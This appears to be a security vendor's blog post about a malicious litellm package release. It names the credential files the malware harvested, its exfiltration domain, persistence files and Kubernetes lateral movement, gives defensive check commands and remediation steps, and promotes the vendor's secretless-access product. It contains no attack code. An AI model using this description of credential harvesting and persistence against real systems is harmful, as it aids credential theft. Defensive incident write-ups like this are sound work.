Supply chain attacks are designed to exploit exactly this. A malicious package runs inside your trust boundary with the same filesystem permissions as the developer who installed it. It does not need to escalate privileges or bypass endpoint controls. It just needs to read files, which any process can do.

Telling developers to rotate secrets more frequently, use a vault, or avoid hardcoding does not change this. As long as access to a resource is gated by possession of a file, any code that can read files can compromise it. The rotation cadence just determines how long the window stays open after a theft.

What a different model looks like

At Hush, we build on a different premise: the credential should never exist on the machine in the first place. Access should be granted based on verified identity and evaluated policy, not on possession of a secret.

Here is what that means concretely for this attack:

Figure 2: How Hush neutralises each stage of the attack. No static secrets to harvest, runtime anomaly detection on exfiltration, and JIT-scoped tokens that make Kubernetes lateral movement structurally impossible.

No static secrets means the harvest finds nothing. When services access AWS, GCP, Azure, databases, or APIs through Hush, they receive short-lived, dynamically issued tokens scoped to exactly the permissions the current workload requires. There is no ~/.aws/credentials. No .env file full of API keys. No Kubernetes Secret holding a database password. A malicious package doing a filesystem crawl returns empty-handed, because the material it is looking for does not exist in that form.

Runtime monitoring surfaces the exfiltration attempt. Hush’s runtime sensor uses eBPF to observe system calls without kernel modification or agent overhead. It tracks which processes open which files, which network connections they initiate, and which identities are behind each action. In the litellm scenario, the sensor would have observed: a Python child process (spawned from a .pth handler) opening credential-shaped files across multiple directories, followed immediately by an outbound TLS connection to models.litellm.cloud from a non-human identity with no policy permitting that destination. That sequence generates an alert with full process ancestry, file access trace, and network destination before the POST completes. The security team sees exactly what happened and which workloads were affected, without waiting for a crash report.

Scoped JIT tokens contain lateral movement. Kubernetes service account tokens issued through Hush are scoped to the minimum permissions the workload needs and expire after a short TTL. A token that allows a pod to read its own namespace’s ConfigMaps cannot be used to list secrets across all namespaces or schedule pods in kube-system. The lateral movement stage of this attack requires a cluster-admin-level or broadly scoped service account token to exist as a long-lived credential. With Hush, that token does not exist. The API calls the malware makes return 403, and the attempt is logged.

There is nothing to rotate after the fact. Incident response after a supply chain compromise normally means identifying every secret that was present on every affected machine and rotating all of them across every system that accepted them. That is an enormous operational exercise, it is time-pressured, and it is still reactive: you are closing a window after the theft. With Hush, the tokens that were present when the malware ran were already scoped and short-lived. They expired on their own. The cleanup conversation is about reviewing the runtime alert and confirming no persistent backdoor was installed, not about tracking down which of your 300 service credentials may have been copied.

If you were affected yesterday

If you installed or upgraded litellm on March 24, 2026, treat any machine that ran it as compromised. The immediate steps:

  • Confirm the version: run pip show litellm and check for 1.82.7 or 1.82.8 in all environments, virtual environments, and uv caches (find ~/.cache/uv -name "litellm_init.pth")
  • Check for persistence: look for ~/.config/sysmon/sysmon.py and ~/.config/systemd/user/sysmon.service on affected machines
  • Audit Kubernetes: check kube-system for pods matching node-setup-* and review audit logs for secret enumeration across namespaces
  • Rotate all credentials that were present: SSH keys, AWS/GCP/Azure credentials, Kubernetes configs, database passwords, and any API keys in .env files or environment variables

Rotation is necessary. It is also a good moment to ask how many of those secrets needed to be long-lived in the first place, and how many machines they were distributed across. That count is your structural exposure.

The question this attack puts to every engineering team is not “were we hit?” It is “what would our posture look like if a package like this ran on our machines for a week without crashing anything?” If the answer involves rotating hundreds of secrets across dozens of systems after the fact, the architecture itself is the risk.

We built Hush to make that question less frightening. If you want to see what eliminating static secrets looks like for your stack, we are happy to walk through it.

Hush Security delivers a unified access and governance platform for AI and non-human identities, replacing secrets with verified identities and dynamic, just-in-time access policies. 

Still Using Secrets?

Let's Fix That.

Get a Demo